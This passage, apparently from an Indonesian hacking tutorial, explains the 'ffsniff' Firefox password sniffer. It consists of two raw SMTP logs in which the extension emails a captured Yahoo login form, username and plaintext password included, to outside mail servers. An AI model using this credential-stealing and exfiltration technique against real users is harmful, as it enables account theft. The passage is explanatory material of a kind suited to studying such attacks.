    250 sender ok

    RCPT TO:

    250 recipient ok

    DATA

    354 go ahead

    Subject: Log Firefox Sniffer



    https://login.yahoo.com/config/login?

    type:name:value

    ---------------

    hidden:.tries:2

    hidden:.intl:us

    hidden:.u:6220o3t4qrv31

    hidden:.v:0

    hidden:.challenge:Uhh09ZXeYC4rgGkrSkirh.TXeHk_

    hidden:hasMsgr:0

    hidden:.chkP:Y

    hidden:.done:http://my.yahoo.com

    hidden:.pd:_ver=0&c=&ivt=&sg=

    text:login:rizkiwicaksono

    password:passwd:inipasswordku

    checkbox:.persistent:y

    submit:.save:Sign In

    .

    250 ok: Message 119895912 accepted

    221 mx1.mail.plasa.com

    QUIT
    Sedangkan komunikasi yang terjadi ketika email dikirim ke @ilmuhacking.com adalah:
    220-gator669.hostgator.com ESMTP Exim 4.69 #1 Tue, 03 Mar 2009 22:15:33 -0600

    220-We do not authorize the use of this system to transport unsolicited,

    220 and/or bulk e-mail.

    EHLO ilmuhacking.com

    250-gator669.hostgator.com Hello ilmuhacking.com [202.43.xxx.xxx]

    250-SIZE 52428800

    250-PIPELINING

    250-AUTH PLAIN LOGIN

    250-STARTTLS

    250 HELP

    MAIL FROM:

    250 OK

    RCPT TO:

    250 Accepted

    DATA

    354 Enter message, ending with "." on a line by itself

    Subject: Log Firefox Sniffer



    https://login.yahoo.com/config/login?

    type:name:value

    ---------------

    hidden:.tries:1

    hidden:.intl:us

    hidden:.u:eljvtc94qs023

    hidden:.v:0

    hidden:.challenge:7FWzfTnmnC3Njv1YadcWnM61LyIw

    hidden:hasMsgr:0

    hidden:.chkP:Y

    hidden:.done:http://my.yahoo.com

    hidden:.pd:_ver=0&c=&ivt=&sg=

    text:login:rizkiwicaksono

    password:passwd:inipasswordakujuga

    checkbox:.persistent:y

    submit:.save:Sign In

    .

    250 OK id=1LeiW6-0002zu-LA

    QUIT

    221 gator669.hostgator.com closing connection
    Dengan selesainya eksekusi send_data() maka ffsniff telah selesai menjalankan tugasnya mengirim email. Selanjutnya ffsniff akan “tidur” menunggu dipanggil oleh event submit dan mulai kembali proses penyadapan password